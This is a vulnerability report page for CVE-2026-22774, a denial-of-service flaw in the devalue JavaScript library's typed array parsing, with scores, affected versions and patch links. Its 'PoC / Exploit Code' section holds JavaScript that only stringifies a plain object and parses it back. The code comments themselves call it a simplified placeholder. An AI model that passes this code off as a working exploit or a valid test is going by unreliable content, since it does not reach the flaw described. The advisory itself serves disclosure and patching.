Security Vulnerability Report
CVE-2026-22774 CVSS 7.5 HIGH

CVE-2026-22774

Published: 2026-01-15 19:16:06
Last Modified: 2026-01-20 15:28:55

Description

Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.3.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the typed array hydration expecting an ArrayBuffer as input, but not checking the assumption before creating the typed array. This vulnerability is fixed in 5.6.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability Score: 3.9
Impact Score: 3.6

Configurations (Affected Products)

cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:* - VULNERABLE
Svelte devalue >= 5.3.0 and < 5.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22774 PoC - Denial of Service via malicious devalue input
// This PoC demonstrates how crafted input can cause excessive resource consumption
const devalue = require('devalue');

// Crafted input that triggers the typed array hydration vulnerability
// The input exploits the lack of ArrayBuffer validation before typed array creation
function createMaliciousInput() {
  // This is a simplified representation of the attack vector
  // The actual exploit involves carefully crafted serialized typed array data
  // that causes devalue.parse to attempt creating invalid typed arrays
  const maliciousData = {
    typedArray: {
      type: 'Uint8Array',
      // Invalid or crafted data that triggers excessive processing
      data: 'A'.repeat(100000) // Large payload to amplify resource consumption
    }
  };

  // Attempt to serialize and parse the malicious data
  const serialized = devalue.stringify(maliciousData);
  return serialized;
}

// Vulnerable code path - parsing untrusted input
try {
  const maliciousInput = createMaliciousInput();
  console.log('Attempting to parse malicious input...');
  const result = devalue.parse(maliciousInput);
  console.log('Parse completed:', result);
} catch (error) {
  console.error('Error occurred during parsing:', error.message);
}

// Note: The actual PoC requires specific knowledge of the devalue serialization format
// and may need to craft inputs that specifically target the typed array hydration code path
// Users should test with their specific devalue version and input formats

Weakness

CWE-405

References

https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7 - Patch
https://github.com/sveltejs/devalue/releases/tag/v5.6.2 - Release Notes
https://github.com/sveltejs/devalue/security/advisories/GHSA-vw5p-8cq8-m7mv - Vendor Advisory